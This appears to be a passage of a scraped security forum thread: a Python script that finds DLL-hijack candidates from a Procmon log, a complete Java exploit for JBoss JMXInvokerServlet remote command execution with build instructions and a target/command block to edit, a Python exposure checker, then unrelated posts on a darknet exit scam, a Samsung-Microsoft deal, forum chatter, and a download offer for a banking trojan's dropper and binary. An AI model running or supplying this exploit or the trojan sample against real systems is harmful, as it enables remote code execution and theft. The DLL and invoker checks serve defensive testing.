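"10:02:11.1234567","BZRPlayer.exe","4120","CreateFile","C:\Program Files\BZR Player\dwmapi.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:11.1234601","BZRPlayer.exe","4120","CreateFile","C:\Windows\System32\dwmapi.dll","SUCCESS","Desired Access: Read Attributes"
"10:02:11.1300000","BZRPlayer.exe","4120","CreateFile","C:\Program Files\BZR Player\fmod.dll","SUCCESS","Desired Access: Read Attributes"
"10:02:11.1400000","BZRPlayer.exe","4120","CreateFile","C:\Program Files\BZR Player\codec_flac.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:11.1500000","BZRPlayer.exe","4120","CreateFile","C:\Users\me\Downloads\track.mod","SUCCESS","Desired Access: Generic Read"
"10:02:11.1600000","BZRPlayer.exe","4120","CreateFile","C:\Users\me\Downloads\codec_xm.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:11.1700000","explorer.exe","1234","CreateFile","C:\Users\me\Downloads\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
'''

NOT_FOUND = ("NAME NOT FOUND", "PATH NOT FOUND")


def hijack_candidates(procmon_csv: str, process_name: str) -> Dict[str, List[str]]:
    """Map each DLL name the process tried to open and did not find to the
    directories it probed. A DLL the process later finds in System32 still
    counts: the earlier probe of a lower-trust directory is the hijack
    point, which is exactly the dwmapi.dll case on Windows 7."""
    probes: Dict[str, List[str]] = {}
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Operation"] != "CreateFile" or row["Result"] not in NOT_FOUND:
            continue
        directory, name = ntpath.split(row["Path"])  # Windows paths on any host
        if not name.lower().endswith(".dll"):
            continue
        probes.setdefault(name.lower(), []).append(directory)
    return probes


def classify(candidates: Dict[str, List[str]],
             app_dir: str) -> Tuple[Dict[str, List[str]], Dict[str, List[str]]]:
    """Split candidates into probes of the application directory and probes
    elsewhere (typically the directory of a document the user opened)."""
    app_dir_probes: Dict[str, List[str]] = {}
    other_probes: Dict[str, List[str]] = {}
    wanted = ntpath.normcase(app_dir)  # case-insensitive, backslash-normalised
    for name, dirs in candidates.items():
        for directory in dirs:
            bucket = app_dir_probes if ntpath.normcase(directory) == wanted else other_probes
            bucket.setdefault(name, []).append(directory)
    return app_dir_probes, other_probes


if __name__ == "__main__":
    found = hijack_candidates(SAMPLE_PROCMON_CSV, "BZRPlayer.exe")
    in_app, elsewhere = classify(found, r"C:\Program Files\BZR Player")
    for name, dirs in sorted(in_app.items()):
        print("application dir :", name, dirs)
    for name, dirs in sorted(elsewhere.items()):
        print("document/cwd dir:", name, dirs)
```

Whether a candidate is actually exploitable still depends on who can write to the probed directory: an application directory under `Program Files` needs a separate weakness (a permissive ACL, or an installer that unpacks to the user profile), whereas the document-directory case only needs the victim to open a file from a folder the attacker filled.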
  18. /*
 * JBoss JMXInvokerServlet Remote Command Execution
 * JMXInvoker.java v0.3 - Luca Carettoni @_ikki
 *
 * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).
 * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"
 * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"
 * and the "JMX Console" are protected or disabled.
 *
 * [FAQ]
 *
 * Q: Is my target vulnerable?
 * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable
 *
 * Q: How to fix it?
 * A: Enable authentication in "jmx-invoker-service.xml"
 *
 * Q: Is this exploit version-dependent?
 * A: Unfortunately, yes. A hash value is used to properly invoke a method.
 *    At least comparing version 4.x and 5.x, these hashes are different.
 *
 * Q: How to compile and launch it?
 * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java
 *    java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker
 * Yes, it's a Java exploit. I can already see some of you complaining....
 */
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.ObjectOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.ConnectException;
import java.net.HttpURLConnection;
import java.net.URL;
import javax.management.MalformedObjectNameException;
import javax.management.ObjectName;
import org.jboss.invocation.MarshalledInvocation; // within jboss.jar (look into the original JBoss installation dir)

// Class name must match the file name JMXInvoker.java used in the compile line above
// (the original declared "public class JMXInvokerServlet", which javac rejects).
public class JMXInvoker {

    // ---------> CHANGE ME <---------
    static final int hash = 647347722; // Weaponized against JBoss 4.0.3SP1
    static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";
    static final String cmd = "touch /tmp/exectest";
    // -------------------------------

    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {
        System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

        // Create a malicious Java serialized object
        MarshalledInvocation payload = new MarshalledInvocation();
        payload.setObjectName(new Integer(hash));

        // Executes the MBean invoke operation
        Class<?> c = Class.forName("javax.management.MBeanServerConnection");
        Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class,
                java.lang.Object[].class, java.lang.String[].class);
        payload.setMethod(method);

        // Define MBean's name, operation and pars
        Object myObj[] = new Object[4];
        // MBean object name
        myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");
        // Operation name
        myObj[1] = new String("createScriptDeployment");
        // Actual parameters: a BeanShell script that runs cmd, plus the deployment name
        myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};
        // Operation signature
        myObj[3] = new String[]{"java.lang.String", "java.lang.String"};
        payload.setArguments(myObj);

        System.out.println("\n--[*] MarshalledInvocation object created");

        // For debugging - visualize the raw object
        // System.out.println(dump(payload));

        // Serialize the object
        try {
            // Send the payload
            URL server = new URL(url);
            HttpURLConnection conn = (HttpURLConnection) server.openConnection();
            conn.setRequestMethod("POST");
            conn.setDoOutput(true);
            conn.setDoInput(true);
            conn.setUseCaches(false);
            conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");
            conn.setRequestProperty("Connection", "keep-alive");
            conn.setRequestProperty("User-Agent", "Java/1.6.0_06");
            conn.setRequestProperty("Content-Type", "application/octet-stream");
            conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");
            conn.setRequestProperty("ContentType",
                    "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");

            ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());
            wr.writeObject(payload);
            System.out.println("\n--[*] MarshalledInvocation object serialized");
            System.out.println("\n--[*] Sending payload...");
            wr.flush();
            wr.close();

            // Get the response
            InputStream is = conn.getInputStream();
            BufferedReader rd = new BufferedReader(new InputStreamReader(is));
            String line;
            StringBuffer response = new StringBuffer();
            while ((line = rd.readLine()) != null) {
                response.append(line);
            }
            rd.close();

            // The deployer echoes the deployment name back on success
            if (response.indexOf("Script Name") != -1) {
                System.out.println("\n--[*] \"" + cmd + "\" successfully executed");
            } else {
                System.out.println("\n--[!] An invocation error occured...");
            }
        } catch (ConnectException cex) {
            System.out.println("\n--[!] A connection error occured...");
        } catch (IOException ex) {
            ex.printStackTrace();
        }
    }

    /*
     * Raw dump of generic Java Objects
     */
    static String dump(Object o) {
        StringBuffer buffer = new StringBuffer();
        Class oClass = o.getClass();
        if (oClass.isArray()) {
            buffer.append("[");
            for (int i = 0; i < Array.getLength(o); i++) {
                if (i > 0) {
                    buffer.append(",\n");
                }
                Object value = Array.get(o, i);
                buffer.append(value.getClass().isArray() ? dump(value) : value);
            }
            buffer.append("]");
        } else {
            buffer.append("{");
            while (oClass != null) {
                Field[] fields = oClass.getDeclaredFields();
                for (int i = 0; i < fields.length; i++) {
                    if (buffer.length() > 1) {
                        buffer.append(",\n");
                    }
                    fields[i].setAccessible(true);
                    buffer.append(fields[i].getName());
                    buffer.append("=");
                    try {
                        Object value = fields[i].get(o);
                        if (value != null) {
                            buffer.append(value.getClass().isArray() ? dump(value) : value);
                        }
                    } catch (IllegalAccessException e) {
                    }
                }
                oClass = oClass.getSuperclass();
            }
            buffer.append("}");
        }
        return buffer.toString();
    }
}
Source
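The FAQ in the header gives the manual test (does /invoker/JMXInvokerServlet exist?). As an added example, not part of Luca Carettoni's exploit, the Python below turns that into a scripted check that also separates an exposed invoker from one that has been put behind authentication as the FAQ recommends. The fingerprint it relies on: an unauthenticated GET to an exposed invoker is answered with a serialized Java object (serialization stream magic AC ED 00 05, Content-Type application/x-java-serialized-object), because the servlet deserializes whatever body it receives and ships the resulting exception back the same way it ships invocation results. The sample responses are constructed and the URL on the command line is a placeholder.

```python
"""
Scripted version of the FAQ check: is /invoker/JMXInvokerServlet reachable
without authentication?

Outcomes:
  exposed   - 200 with a serialized Java object: the invoker accepts
              unauthenticated MarshalledInvocation objects
  protected - 401/403: deployed but behind authentication
              (the jmx-invoker-service.xml fix)
  absent    - 404: the invoker web application is not deployed
  unknown   - anything else (proxy page, different product, error)
"""
import sys
import urllib.error
import urllib.request

INVOKER_PATH = "/invoker/JMXInvokerServlet"
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"  # ObjectOutputStream STREAM_MAGIC + STREAM_VERSION


def classify_invoker_response(status, content_type, body):
    """Map an HTTP response from INVOKER_PATH to one of the outcomes above."""
    if status in (401, 403):
        return "protected"
    if status == 404:
        return "absent"
    if status == 200:
        ctype = (content_type or "").lower()
        # Either signal is enough: some front-end proxies rewrite the header,
        # but the serialized body still starts with the stream magic.
        if "application/x-java-serialized-object" in ctype or body.startswith(JAVA_SERIAL_MAGIC):
            return "exposed"
    return "unknown"


def probe(base_url, timeout=5.0):
    """GET base_url + INVOKER_PATH and classify it (needs network access)."""
    req = urllib.request.Request(base_url.rstrip("/") + INVOKER_PATH,
                                 headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_invoker_response(resp.status, resp.headers.get("Content-Type"), resp.read(64))
    except urllib.error.HTTPError as err:
        # 401/403/404 arrive here; the error object still carries headers and body
        return classify_invoker_response(err.code, err.headers.get("Content-Type"), err.read(64))


# Constructed responses (no real server was captured) covering the four outcomes.
SAMPLE_RESPONSES = {
    "exposed": (200, "application/x-java-serialized-object",
                JAVA_SERIAL_MAGIC + b"sr\x00(org.jboss.invocation.InvocationException"),
    "protected": (401, "text/html", b"<html>401 Unauthorized</html>"),
    "absent": (404, "text/html", b"<html>404 Not Found</html>"),
    "unknown": (200, "text/html", b"<html>Welcome to JBoss</html>"),
}


if __name__ == "__main__":
    if len(sys.argv) > 1:  # e.g. python jmxcheck.py http://127.0.0.1:8080
        print(probe(sys.argv[1]))
    else:
        for expected, (status, ctype, body) in SAMPLE_RESPONSES.items():
            print(f"{expected:9s} -> {classify_invoker_response(status, ctype, body)}")
```

An "exposed" result only confirms that the servlet will deserialize unauthenticated input; the method hash the exploit needs (647347722 for 4.0.3SP1 above) still has to match the target's JBoss version.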
  19. Thomas Jiřikovský, the alleged owner of one of the most popular Darknet websites, 'Sheep Marketplace', has been arrested after laundering around $40 million, making it one of the biggest exit scams in Darknet history.

After the arrest of Silk Road owner Ross Ulbricht in 2013, Sheep Marketplace became the next famous anonymous underground marketplace among black market customers for selling illicit products, especially drugs. But only a few weeks later, Sheep Marketplace suddenly disappeared and was taken offline by its owner, who was suspected of stealing $40 million worth of Bitcoins at a time when the Bitcoin market value was at its peak.

Shortly after this Bitcoin scam, a Darknet commentator, Gwern Branwen, doxed the owner, and the suspect was identified: Thomas Jiřikovský as the owner of the black market website. Unfortunately, Jiřikovský forgot to hide his identity and residential address from the Internet, which were exposed by his Facebook page. However, immediately after his identity was exposed, Jiřikovský denied any involvement in the Darknet Sheep Marketplace.

While investigating the money stolen from the online market, Czech police noticed a suspicious young programmer who attempted to buy a luxury home worth 8.7 million Czech koruna ($345,000 USD) in Lusatia, a region in the Czech Republic, under his grandfather's name. Additional investigation revealed that in January last year, a new bank account belonging to 26-year-old Eva Bartošová received a huge payment of almost 900,000 crowns from a foreign Bitcoin exchange company. However, the young woman was unable to justify the source of the money. According to Czech media, Eva Bartošová is Thomas Jiřikovský's wife, who helped him transfer the stolen money to her freshly created bank account. The Czech Economic Police wing investigated Jiřikovský's money and found that the house had been purchased entirely using Bitcoin.

Two weeks back, another large Deep Web drugs marketplace, 'Evolution', disappeared suddenly, with rumors circulating that its owners may have scammed its massive user base and stolen $12 million in Bitcoin. Source
  20. @Kalashnikov. Several are missing from Retired Administrators. (Probably they didn't want to be listed.)
  21. Samsung announced today that it is extending its partnership with Microsoft and that it intends for some Microsoft services and applications to come preinstalled on the company's new Android devices. At the same time, Samsung will work with Microsoft on developing the KNOX security service for the new Microsoft Office 365. Another benefit is that owners of a Samsung Galaxy S6 or Samsung Galaxy S6 edge will receive 100 GB of cloud storage on Microsoft OneDrive, free, for two years. And those who buy a Samsung device through business-to-business sales channels will get access to three versions of Office 365 (Business, Business Premium and Enterprise), plus the KNOX security solution. The collaboration between the two companies took a step forward at Mobile World Congress, when Samsung announced that the new Samsung Galaxy S6 and Galaxy S6 edge smartphones would include the OneNote, OneDrive and Skype apps. Moreover, the company announced that in the first half of the year, Microsoft Word, Excel, PowerPoint, OneNote, OneDrive and Skype are to be preinstalled on a series of Android tablets. Source
  22. GirlShare - Download WnALA.txt
  23. @luca123 you're welcome, but I'm not an administrator
  24. Aerosol

    Hi.

    Hi and welcome to our forum. I hope you stay with us as long as possible and learn as much as you can; since you made an account here it's clear you're passionate about something in the IT field, so good luck. Off:// Message to those who insulted him. - What did you achieve by cursing at the guy? That's how he wanted to say hello; he's not obliged to follow a certain pattern, so stop it. @tricks don't pay attention to everyone who attacks you.
  25. So the guys from S21sec found a new banker. S21sec Security Blog: New banking trojan 'Slave' hitting Polish Banks. Attached: dropper + unpacked bin. Download